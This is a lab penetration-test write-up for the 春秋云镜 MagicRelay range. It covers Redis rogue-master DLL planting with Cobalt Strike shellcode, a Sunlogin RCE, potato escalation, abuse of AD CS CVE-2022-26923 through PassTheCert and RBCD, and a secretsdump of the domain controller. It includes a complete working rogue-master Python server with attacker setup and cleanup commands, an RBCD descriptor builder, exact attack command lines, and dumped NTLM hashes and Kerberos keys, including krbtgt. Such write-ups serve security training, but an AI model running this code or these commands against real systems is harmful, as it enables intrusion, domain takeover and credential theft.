
Pentest notes: 春秋云镜 MagicRelay

April 7, 2025

Public-facing host: flag1

We are given an IP, so start with a port scan.

Redis is reachable without authentication and the box is Windows, so the plan is to write a DLL onto it and have Redis load that DLL when BGREWRITEAOF or BGSAVE runs, giving us a callback to our public IP. (`INFO server` reports the platform in its `os:` line, which is a quick way to confirm the target really is the Windows build before going down this road.)

Fair enough, but why does it have to be Windows (grr)

The DLL carries a CS shellcode: allocate memory, copy the shellcode in, and jump to it.

Note: a few compiler options had to be changed before the DLL would work as intended.

Write the DLL to disk through Redis master-slave replication: set dir and dbfilename to the target path, then SLAVEOF to a rogue master that hands the DLL over as the full-sync payload.

Connect with a client, issue BGSAVE, and the CS beacon comes in.
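The replication write used in the steps above, as an added example (my code, not the post's and not that of redis-rogue-server or any other project): a rogue master that answers the slave handshake and ships an arbitrary file body, plus the RESP commands the attacker sends beforehand and the cleanup afterwards. Everything is self-contained and runs offline; the payload bytes and the Redis directory are placeholders, and the DLL name is an argument (dbghelp.dll, the name commonly abused on the Windows Redis 3.x port, is my assumption, not something the post states).

```python
"""Rogue-master replication exchange that writes an arbitrary file (here a DLL)
through an unauthenticated Redis. Added example, not the post's code. The payload
bytes and paths are placeholders; dbghelp.dll as the filename is an assumption."""
import os
import socket

CRLF = b"\r\n"


def resp_encode(*args):
    """Encode a command as a RESP array of bulk strings, as redis-cli sends it."""
    out = [b"*%d%s" % (len(args), CRLF)]
    for a in args:
        b = a if isinstance(a, bytes) else str(a).encode()
        out.append(b"$%d%s%s%s" % (len(b), CRLF, b, CRLF))
    return b"".join(out)


def resp_decode_array(buf):
    """Decode one RESP array (or inline command) -> (args, unread bytes).
    Raises ValueError when the buffer does not yet hold the whole command."""
    if not buf.startswith(b"*"):
        line, _, rest = buf.partition(CRLF)
        return line.decode().split(), rest
    head, _, rest = buf.partition(CRLF)
    args = []
    for _ in range(int(head[1:])):
        size_line, sep, rest = rest.partition(CRLF)
        size = int(size_line[1:]) if sep else -1
        if size < 0 or len(rest) < size + len(CRLF):
            raise ValueError("incomplete RESP array")
        args.append(rest[:size].decode())
        rest = rest[size + len(CRLF):]
    return args, rest


def attacker_setup_commands(attacker_ip, attacker_port, target_dir, dll_name):
    """Sent to the victim first: land the 'RDB' at target_dir\\dll_name, then make
    the victim replicate from our rogue master."""
    return [resp_encode("CONFIG", "SET", "dir", target_dir),
            resp_encode("CONFIG", "SET", "dbfilename", dll_name),
            resp_encode("SLAVEOF", attacker_ip, attacker_port)]


def attacker_cleanup_commands(original_dbfilename="dump.rdb"):
    """Detach again so the service keeps working and a later genuine BGSAVE
    does not overwrite the DLL with a real dump."""
    return [resp_encode("SLAVEOF", "NO", "ONE"),
            resp_encode("CONFIG", "SET", "dbfilename", original_dbfilename)]


class RogueMaster:
    """Answers the slave handshake (PING, REPLCONF ..., PSYNC) and ships `payload`
    as the full-resync body, which the slave writes verbatim to dir/dbfilename.
    The RDB transfer is '$<len>\\r\\n<bytes>' with no trailing CRLF."""

    def __init__(self, payload):
        self.payload = payload
        self.run_id = os.urandom(20).hex()  # 40 hex chars, like a real master
        self.sent_payload = False

    def reply(self, args):
        cmd = args[0].upper() if args else ""
        if cmd == "PING":
            return b"+PONG" + CRLF
        if cmd == "REPLCONF":
            return b"+OK" + CRLF
        if cmd in ("PSYNC", "SYNC"):
            self.sent_payload = True
            return b"+FULLRESYNC %s 1%s$%d%s%s" % (
                self.run_id.encode(), CRLF, len(self.payload), CRLF, self.payload)
        return b"-ERR unknown command '%s'%s" % (cmd.encode(), CRLF)


def serve_once(bind_port, payload, timeout=30):
    """Accept one slave connection and drive it with RogueMaster; returns True once
    the payload has gone out. Not called at import; run it while the victim is
    told SLAVEOF <our ip> <bind_port>."""
    master = RogueMaster(payload)
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", bind_port))
        srv.listen(1)
        srv.settimeout(timeout)
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(timeout)
            buf = b""
            while not master.sent_payload:
                data = conn.recv(4096)
                if not data:
                    break
                buf += data
                while CRLF in buf and not master.sent_payload:
                    try:
                        args, buf = resp_decode_array(buf)
                    except ValueError:
                        break  # wait for the rest of the command
                    conn.sendall(master.reply(args))
    return master.sent_payload
```

In use, send `attacker_setup_commands(...)` to the victim over port 6379, run `serve_once` on the port named in SLAVEOF, then send `attacker_cleanup_commands()`; the file now sitting at dir/dbfilename is whatever bytes the master served, which is why the same trick also writes web shells and SSH keys on Linux targets.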

Administrator privileges, and flag1 is in hand.

Added a user, connected over RDP, uploaded fscan and scanned the internal network.

Internal network results:

[2025-04-07 12:11:56] [HOST] 目标:172.22.12.6 状态:alive 详情:protocol=ICMP
[2025-04-07 12:11:56] [HOST] 目标:172.22.12.12 状态:alive 详情:protocol=ICMP
[2025-04-07 12:11:57] [HOST] 目标:172.22.12.25 状态:alive 详情:protocol=ICMP
[2025-04-07 12:11:57] [HOST] 目标:172.22.12.31 状态:alive 详情:protocol=ICMP
[2025-04-07 12:11:59] [PORT] 目标:172.22.12.6 状态:open 详情:port=88
[2025-04-07 12:11:59] [PORT] 目标:172.22.12.12 状态:open 详情:port=80
[2025-04-07 12:11:59] [PORT] 目标:172.22.12.31 状态:open 详情:port=80
[2025-04-07 12:11:59] [PORT] 目标:172.22.12.31 状态:open 详情:port=21
[2025-04-07 12:11:59] [SERVICE] 目标:172.22.12.31 状态:identified 详情:banner=220 Microsoft FTP Service., port=21, service=ftp, product=Microsoft ftpd, os=Windows
[2025-04-07 12:12:00] [PORT] 目标:172.22.12.6 状态:open 详情:port=135
[2025-04-07 12:12:00] [PORT] 目标:172.22.12.25 状态:open 详情:port=135
[2025-04-07 12:12:00] [PORT] 目标:172.22.12.12 状态:open 详情:port=135
[2025-04-07 12:12:00] [PORT] 目标:172.22.12.31 状态:open 详情:port=135
[2025-04-07 12:12:00] [PORT] 目标:172.22.12.31 状态:open 详情:port=139
[2025-04-07 12:12:00] [PORT] 目标:172.22.12.25 状态:open 详情:port=139
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.12 状态:open 详情:port=139
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.6 状态:open 详情:port=139
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.31 状态:open 详情:port=445
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.12 状态:open 详情:port=445
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.25 状态:open 详情:port=445
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.6 状态:open 详情:port=445
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.6 状态:open 详情:port=389
[2025-04-07 12:12:04] [SERVICE] 目标:172.22.12.6 状态:identified 详情:port=88, service=unknown
[2025-04-07 12:12:04] [SERVICE] 目标:172.22.12.12 状态:identified 详情:port=80, service=http
[2025-04-07 12:12:05] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=80, service=http
[2025-04-07 12:12:05] [PORT] 目标:172.22.12.25 状态:open 详情:port=6379
[2025-04-07 12:12:05] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=139, service=unknown, banner=.
[2025-04-07 12:12:05] [SERVICE] 目标:172.22.12.25 状态:identified 详情:port=139, service=unknown, banner=.
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:banner=., port=139, service=unknown
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:banner=., port=139, service=unknown
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=445, service=unknown
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:port=445, service=unknown
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.25 状态:identified 详情:port=445, service=unknown
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:port=445, service=unknown
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:product=Microsoft Windows Active Directory LDAP, os=Windows, info=Domain: xiaorang.lab, Site: Default-First-Site-Name, port=389, service=ldap
[2025-04-07 12:12:10] [SERVICE] 目标:172.22.12.25 状态:identified 详情:port=6379, service=redis, version=3.0.504, product=Redis key-value store
[2025-04-07 12:13:05] [SERVICE] 目标:172.22.12.6 状态:identified 详情:port=135, service=unknown
[2025-04-07 12:13:05] [SERVICE] 目标:172.22.12.25 状态:identified 详情:port=135, service=unknown
[2025-04-07 12:13:05] [SERVICE] 目标:172.22.12.12 状态:identified 详情:port=135, service=unknown
[2025-04-07 12:13:05] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=135, service=unknown
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:hostname=WIN-SERVER, ipv4=[172.22.12.6], ipv6=[]
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:hostname=WIN-AUTHORITY, ipv4=[172.22.12.12], ipv6=[]
[2025-04-07 12:13:06] [VULN] 目标:http://172.22.12.12:80 状态:vulnerable 详情:author=AgeloVito, references=[https://www.cnblogs.com/EasonJim/p/6859345.html], vulnerability_type=poc-yaml-active-directory-certsrv-detect, vulnerability_name=
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.25 状态:identified 详情:ipv6=[], hostname=WIN-YUYAOX9Q, ipv4=[172.22.12.25]
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.31 状态:identified 详情:status_code=200, length=703, server_info=map[accept-ranges:bytes content-length:703 content-type:text/html date:Mon, 07 Apr 2025 04:13:07 GMT etag:"bc9379eff5fdb1:0" last-modified:Mon, 06 Jan 2025 05:55:41 GMT length:703 server:Microsoft-IIS/10.0 status_code:200 title:IIS Windows Server], fingerprints=[], port=80, service=http, title=IIS Windows Server, url=http://172.22.12.31
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:server_info=map[accept-ranges:bytes content-length:703 content-type:text/html date:Mon, 07 Apr 2025 04:13:06 GMT etag:"a6e63f4642ebd81:0" last-modified:Sat, 29 Oct 2022 02:58:08 GMT length:703 server:Microsoft-IIS/10.0 status_code:200 title:IIS Windows Server], fingerprints=[], port=80, service=http, title=IIS Windows Server, url=http://172.22.12.12, status_code=200, length=703
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.31 状态:identified 详情:hostname=WIN-IISQE3PC, ipv4=[172.22.12.31], ipv6=[]
[2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.6 状态:identified 详情:port=445, service=smb, os=Windows Server 2016 Standard 14393
[2025-04-07 12:13:08] [VULN] 目标:172.22.12.31 状态:vulnerable 详情:username=anonymous, password=, type=anonymous-login, directories=[SunloginClient_11.0.0.33826_x64.exe], port=21, service=ftp
[2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=139, domain_name=WORKGROUP, workstation_service=WIN-IISQE3PC, server_service=WIN-IISQE3PC
[2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.6 状态:identified 详情:computer_name=WIN-SERVER.xiaorang.lab, server_service=WIN-SERVER, domain_controllers=XIAORANG, os_version=Windows Server 2016 Standard 14393, port=139, domain_name=xiaorang.lab, netbios_domain=XIAORANG, netbios_computer=WIN-SERVER, workstation_service=WIN-SERVER
[2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.12 状态:identified 详情:domain_name=xiaorang.lab, netbios_domain=XIAORANG, netbios_computer=WIN-AUTHORITY, workstation_service=WIN-AUTHORITY, server_service=WIN-AUTHORITY, os_version=Windows Server 2016 Datacenter 14393, port=139, computer_name=WIN-AUTHORITY.xiaorang.lab
[2025-04-07 12:13:13] [VULN] 目标:172.22.12.25 状态:vulnerable 详情:port=6379, service=redis, type=unauthorized

So the internal hosts are:

172.22.12.6 domain controller WIN-SERVER.xiaorang.lab
172.22.12.12 CA server (poc-yaml-active-directory-certsrv-detect)
172.22.12.25 foothold host, the one we came in through (Redis unauthenticated access)
172.22.12.31 FTP (one file on it: SunloginClient)
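The host summary above was compiled by hand from the scan output. As an added example (my code, not the post's and not fscan's), here is a parser that turns fscan 2.x output lines, Chinese field labels included, into a per-host inventory and derives the same roles (DC, AD CS web enrollment, Redis unauthenticated, anonymous FTP). SAMPLE_LINES is a verbatim subset of the scan lines above; the role rules are my own heuristics.

```python
"""Parse fscan 2.x output into a per-host inventory and derive host roles.
Added example, not the post's code or fscan's. SAMPLE_LINES is a verbatim subset
of the scan output above; the role rules are my own heuristics."""
import re

LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<kind>HOST|PORT|SERVICE|VULN)\] "
    r"目标:(?P<target>\S+) 状态:(?P<state>\S+)(?: 详情:(?P<detail>.*))?$")
IP_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

SAMPLE_LINES = """\
[2025-04-07 12:11:56] [HOST] 目标:172.22.12.6 状态:alive 详情:protocol=ICMP
[2025-04-07 12:11:59] [PORT] 目标:172.22.12.6 状态:open 详情:port=88
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.6 状态:open 详情:port=389
[2025-04-07 12:11:59] [PORT] 目标:172.22.12.12 状态:open 详情:port=80
[2025-04-07 12:11:59] [PORT] 目标:172.22.12.31 状态:open 详情:port=21
[2025-04-07 12:12:05] [PORT] 目标:172.22.12.25 状态:open 详情:port=6379
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:product=Microsoft Windows Active Directory LDAP, os=Windows, info=Domain: xiaorang.lab, Site: Default-First-Site-Name, port=389, service=ldap
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:hostname=WIN-SERVER, ipv4=[172.22.12.6], ipv6=[]
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:hostname=WIN-AUTHORITY, ipv4=[172.22.12.12], ipv6=[]
[2025-04-07 12:13:06] [VULN] 目标:http://172.22.12.12:80 状态:vulnerable 详情:author=AgeloVito, references=[https://www.cnblogs.com/EasonJim/p/6859345.html], vulnerability_type=poc-yaml-active-directory-certsrv-detect, vulnerability_name=
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.25 状态:identified 详情:ipv6=[], hostname=WIN-YUYAOX9Q, ipv4=[172.22.12.25]
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.31 状态:identified 详情:status_code=200, length=703, server_info=map[accept-ranges:bytes content-length:703 content-type:text/html date:Mon, 07 Apr 2025 04:13:07 GMT etag:"bc9379eff5fdb1:0" last-modified:Mon, 06 Jan 2025 05:55:41 GMT length:703 server:Microsoft-IIS/10.0 status_code:200 title:IIS Windows Server], fingerprints=[], port=80, service=http, title=IIS Windows Server, url=http://172.22.12.31
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.31 状态:identified 详情:hostname=WIN-IISQE3PC, ipv4=[172.22.12.31], ipv6=[]
[2025-04-07 12:13:08] [VULN] 目标:172.22.12.31 状态:vulnerable 详情:username=anonymous, password=, type=anonymous-login, directories=[SunloginClient_11.0.0.33826_x64.exe], port=21, service=ftp
[2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.6 状态:identified 详情:computer_name=WIN-SERVER.xiaorang.lab, server_service=WIN-SERVER, domain_controllers=XIAORANG, os_version=Windows Server 2016 Standard 14393, port=139, domain_name=xiaorang.lab, netbios_domain=XIAORANG, netbios_computer=WIN-SERVER, workstation_service=WIN-SERVER
[2025-04-07 12:13:13] [VULN] 目标:172.22.12.25 状态:vulnerable 详情:port=6379, service=redis, type=unauthorized
"""


def split_detail(detail):
    """Split 'k=v, k2=v2' on top-level commas only; commas inside [...] (lists,
    Go map[...] dumps of HTTP headers) belong to the value."""
    items, cur, depth = [], [], 0
    for ch in detail:
        if ch == "[":
            depth += 1
        elif ch == "]":
            depth -= 1
        if ch == "," and depth == 0:
            items.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    items.append("".join(cur))
    fields = {}
    for item in items:
        key, sep, value = item.strip().partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def build_inventory(text):
    """{ip: {hostname, domain, os, ports, services, vulns}} from raw fscan lines."""
    hosts = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ip = IP_RE.search(m["target"]).group(0)  # VULN targets may be URLs
        h = hosts.setdefault(ip, {"hostname": None, "domain": None, "os": None,
                                  "ports": set(), "services": {}, "vulns": []})
        d = split_detail(m["detail"] or "")
        if m["kind"] == "PORT" and "port" in d:
            h["ports"].add(int(d["port"]))
        elif m["kind"] == "SERVICE":
            h["hostname"] = d.get("hostname", h["hostname"])
            h["domain"] = d.get("domain_name", h["domain"])
            h["os"] = d.get("os_version", h["os"])
            if "port" in d and "service" in d:
                h["services"][int(d["port"])] = d["service"]
        elif m["kind"] == "VULN":
            h["vulns"].append(d)
    return hosts


def roles(h):
    """Heuristic labels for one host, in the order the evidence appears."""
    out = []
    if {88, 389} <= h["ports"]:  # Kerberos + LDAP open: almost certainly a DC
        out.append("DC (Kerberos+LDAP)")
    for v in h["vulns"]:
        if "certsrv" in v.get("vulnerability_type", ""):
            out.append("AD CS web enrollment (certsrv)")
        elif v.get("type") == "unauthorized" and v.get("service") == "redis":
            out.append("Redis unauthenticated")
        elif v.get("type") == "anonymous-login":
            out.append("FTP anonymous login " + v.get("directories", ""))
    return out


def summarize(text):
    """[(ip, hostname, domain, roles), ...] sorted by address."""
    inv = build_inventory(text)
    return [(ip, h["hostname"], h["domain"], roles(h))
            for ip, h in sorted(inv.items(),
                                key=lambda kv: tuple(map(int, kv[0].split("."))))]
```

Running `summarize(SAMPLE_LINES)` reproduces the four-line summary above; the same function applied to a full fscan log of a larger range is a reasonable first cut at a target list.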

Sunlogin (向日葵) RCE: flag02

Looked up Sunlogin and there is a known RCE in it.

Built the exploit, uploaded it and ran it against the host.

SYSTEM privileges. The host is not domain-joined and holds nothing else of interest, so just take the flag.

The remaining three hosts are all in the domain. Before going for the domain controller, gather information.

Information gathering

whoami /priv shows SeImpersonatePrivilege, so escalate with SweetPotato.

Then another CS beacon.

Run SharpHound and pull the collection into BloodHound.

No obvious path shows up, but the CA server appears to be vulnerable.

CA Server:CVE-2022-26923(flag04)

This is an Active Directory privilege-escalation vulnerability: by abusing Active Directory Certificate Services (AD CS), an attacker requests a computer certificate for an arbitrary attacker-controlled DNS hostname, which lets any computer account in the domain impersonate a domain controller and leads to full domain takeover.

CA information

Attack procedure

  1. Dump hashes to get the hash of an existing machine account.
	 * Username : WIN-YUYAOX9Q$
	 * Domain   : XIAORANG
	 * NTLM     : e611213c6a712f9b18a8d056005a4f0f
	 * SHA1     : 1a8d2c95320592037c0fa583c1f62212d4ff8ce9
  2. Use that machine account to create a new machine account.
    • Pass-the-hash: authenticate with the NTLM hash instead of a password.
    • Create the new machine account (libr$).
  3. Request a certificate.
  4. Done...?

This errors out: the domain controller has no certificate usable for smart-card (PKINIT) authentication, so Kerberos will not accept the certificate. Try Schannel instead and pass the certificate over LDAPS.

Use this (PassTheCert; the first command only confirms who the certificate authenticates as, the second writes resource-based constrained delegation from libr$ to win-server$):

proxychains4 -q python pass_the_cert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.12.6
proxychains4 -q python pass_the_cert.py  -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.12.6 -delegate-to 'win-server$' -delegate-from 'libr$'

Then request a service ticket (ST) the usual way, import the ticket, and you can log in with no password.

Imported the ticket and got flag4.
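What `-action write_rbcd` actually writes is a security descriptor into msDS-AllowedToActOnBehalfOfOtherIdentity on win-server$, naming the account that may delegate. As an added example (my code, not the post's, and not PassTheCert's or impacket's implementation), here is that descriptor built and parsed from scratch, with a merge step that keeps whatever delegation already existed. The SIDs are constructed placeholders, since the real SID of libr$ is not shown on the page; the full-control mask 0xF01FF is the value common tooling writes for this ACE.

```python
"""Build/parse the self-relative security descriptor stored in
msDS-AllowedToActOnBehalfOfOtherIdentity (resource-based constrained delegation).
Added example, not the post's code nor PassTheCert's or impacket's. SIDs used in
tests are constructed placeholders; the real libr$ SID is not on the page."""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 0x04
FULL_CONTROL = 0x000F01FF          # mask common RBCD tooling writes (assumption)
BUILTIN_ADMINS = "S-1-5-32-544"    # owner/group usually set on this descriptor
SD_HEADER = "<BBHIIII"             # Revision, Sbz1, Control, OffOwner, OffGroup, OffSacl, OffDacl


def sid_to_bytes(sid):
    """'S-1-5-21-...-1106' -> binary SID: revision, sub-auth count,
    48-bit big-endian identifier authority, little-endian sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: %r" % sid)
    subs = [int(x) for x in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, off=0):
    """Inverse of sid_to_bytes; returns (sid_string, bytes_consumed)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(map(str, subs))), 8 + 4 * count


def build_ace(sid, mask=FULL_CONTROL):
    """ACCESS_ALLOWED_ACE: type, flags, size, mask, then the SID."""
    sid_b = sid_to_bytes(sid)
    return struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), mask) + sid_b


def build_rbcd_sd(allowed_sids, owner=BUILTIN_ADMINS, group=BUILTIN_ADMINS):
    """Self-relative SD whose DACL grants `mask` to each SID in allowed_sids."""
    owner_b, group_b = sid_to_bytes(owner), sid_to_bytes(group)
    aces = b"".join(build_ace(s) for s in allowed_sids)
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces),
                       len(allowed_sids), 0) + aces
    off_owner = struct.calcsize(SD_HEADER)
    off_group = off_owner + len(owner_b)
    off_dacl = off_group + len(group_b)
    header = struct.pack(SD_HEADER, 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)
    return header + owner_b + group_b + dacl


def parse_rbcd_sd(sd):
    """Return [(sid, mask), ...] for every ACCESS_ALLOWED ACE in the DACL."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from(SD_HEADER, sd, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, allowed = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            allowed.append((bytes_to_sid(sd, pos + 8)[0], mask))
        pos += ace_size
    return allowed


def merge_rbcd(existing_sd, new_sid):
    """What a careful write_rbcd does: read the attribute first, keep the SIDs
    already delegated (so legitimate RBCD is not clobbered and the change is
    easy to revert), and add new_sid only if it is missing."""
    current = [s for s, _ in parse_rbcd_sd(existing_sd)] if existing_sd else []
    if new_sid in current:
        return existing_sd
    return build_rbcd_sd(current + [new_sid])
```

The bytes returned by `build_rbcd_sd` are what goes into the LDAP modify (replace) of msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer object; after that, `getST.py -impersonate administrator` for a service on win-server$ works exactly as in the post. Reading the attribute back and running `parse_rbcd_sd` on it is also the quickest way to verify the write landed, or, from the defender's side, to spot a delegation entry that should not be there.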

Domain controller: flag03

Dump SAM and NTDS with secretsdump

proxychains4 -q python examples/secretsdump.py 'xiaorang.lab/[email protected]' -target-ip 172.22.12.6 -no-pass -k
Impacket v0.13.0.dev0+20250404.133223.00ced47 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3d0b51771c180c3bfcb89c8258922751
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d418e6aaeff1177bee5f84cf0466802c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
XIAORANG\WIN-SERVER$:plain_password_hex:c8af46916615d6c0f20c37b50eada8e87ba37f27483b0ff9537cb66a8f680a0b427b80e5d4cbe080fb0b0ec0382453bcfef20dd2fa9cf3415a5120661952615db594724ea6d7a55348ac8f5f6fb410201158c306975a3045c7a5770f096bd6c59813b93a2e337e2eea26495b5d4c76877804a042de567b58fd7463da84e10b9e12d6a443033d5675633f4654126ee26a65c198c0d80947b366d75a0df141202bd4f1666b0d16fa84323347293727d178c087cd50b5ed74de331a08bd1296af911b98e6a9d59fa20fd4c090cf7ecc52b338070fff6580b0c03f48a0d4086a36e2f7bcc3bc1cb92f1a567fec3516f9a1cf
XIAORANG\WIN-SERVER$:aad3b435b51404eeaad3b435b51404ee:2cea1abad5400a098d0b35a843784d4f:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1013bf8bbf66971ac0c6c4938c9c187c859ef5b7
dpapi_userkey:0xfd5a847b92da1e611b6a94df40e674f00b7054f8
[*] NL$KM
 0000   9D 83 14 71 4B 67 2E 66  8B 36 79 E5 74 94 DF CE   ...qKg.f.6y.t...
 0010   F8 0F 28 EC 6A 7A 89 28  4F F7 D1 07 B7 9A B8 6E   ..(.jz.(O......n
 0020   14 76 A6 CC 5E 52 A4 86  86 55 3A C1 37 51 5D 87   .v..^R...U:.7Q].
 0030   3D 33 6E A7 45 EE 79 E8  89 60 CC A6 AA 98 58 EE   =3n.E.y..`....X.
NL$KM:9d8314714b672e668b3679e57494dfcef80f28ec6a7a89284ff7d107b79ab86e1476a6cc5e52a48686553ac137515d873d336ea745ee79e88960cca6aa9858ee
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aa95e708a5182931157a526acf769b13:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a12e9453c13fc38f271f91059d9876d5:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
zhangling:1105:aad3b435b51404eeaad3b435b51404ee:07d308b46637d5a5035f1723d23dd274:::
WIN-SERVER$:1000:aad3b435b51404eeaad3b435b51404ee:2cea1abad5400a098d0b35a843784d4f:::
WIN-YUYAOX9Q$:1103:aad3b435b51404eeaad3b435b51404ee:e611213c6a712f9b18a8d056005a4f0f:::
WIN-AUTHORITY$:1104:aad3b435b51404eeaad3b435b51404ee:961cec4c991735bb30a01a87755db088:::
libr$:1106:aad3b435b51404eeaad3b435b51404ee:8cfe95318f473953c652fb55318f4371:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:931811f533238603f8b5158286cf9ad36ce6a57e4f27ec79450579e0b05893eb
Administrator:aes128-cts-hmac-sha1-96:068731dadb1705703176cfc37a5c5450
Administrator:des-cbc-md5:256dfbb0f87aef29
krbtgt:aes256-cts-hmac-sha1-96:1a711447ae68067f6212ca0e9eb30c85443d65ad7546e6fa9e3b7024199f7e2e
krbtgt:aes128-cts-hmac-sha1-96:b50c4f039acd8413cc01725d9cc9be9d
krbtgt:des-cbc-md5:c285a826dac4fe58
zhangling:aes256-cts-hmac-sha1-96:ae14f076559febbb8e32d87b1751160e64e95bec8ada9f3ba74c37c6e9f53874
zhangling:aes128-cts-hmac-sha1-96:a8bf7463f1b20a7c1cae3f1ab8ce9ed8
zhangling:des-cbc-md5:e0f4d534bc3bd0e5
WIN-SERVER$:aes256-cts-hmac-sha1-96:92f078626759fadaafdfb210c729858cbd3c2dc63a98885a6e45af12f5f920e3
WIN-SERVER$:aes128-cts-hmac-sha1-96:7f134e7e6467c3eb76adeb422a08c4a0
WIN-SERVER$:des-cbc-md5:1a83f8c2467a547c
WIN-YUYAOX9Q$:aes256-cts-hmac-sha1-96:4c58dac71ff0e6765509efd6b3977782df8ab54ef0fda0b9f9317015d509fbcf
WIN-YUYAOX9Q$:aes128-cts-hmac-sha1-96:072d1926fb98407684a30c2312ca2199
WIN-YUYAOX9Q$:des-cbc-md5:b97fa1f29e9b311c
WIN-AUTHORITY$:aes256-cts-hmac-sha1-96:206906767424e178d150d42b658a123cd791a16bffa06b858ec1bf9220b791d2
WIN-AUTHORITY$:aes128-cts-hmac-sha1-96:4edb0c133055745a917c09f4840ef99c
WIN-AUTHORITY$:des-cbc-md5:c2fe325ea16d7aea
libr$:aes256-cts-hmac-sha1-96:cfcc383f9f8d6908264768c7a536002869fc26359d5d32e67c8c657c95affc9f
libr$:aes128-cts-hmac-sha1-96:b3f893d4a827eaa41203c0a22ad7030e
libr$:des-cbc-md5:1a92830ea8e675d9
[*] Cleaning up...

That yields the domain Administrator hash: aa95e708a5182931157a526acf769b13

Pass-the-hash to log in.
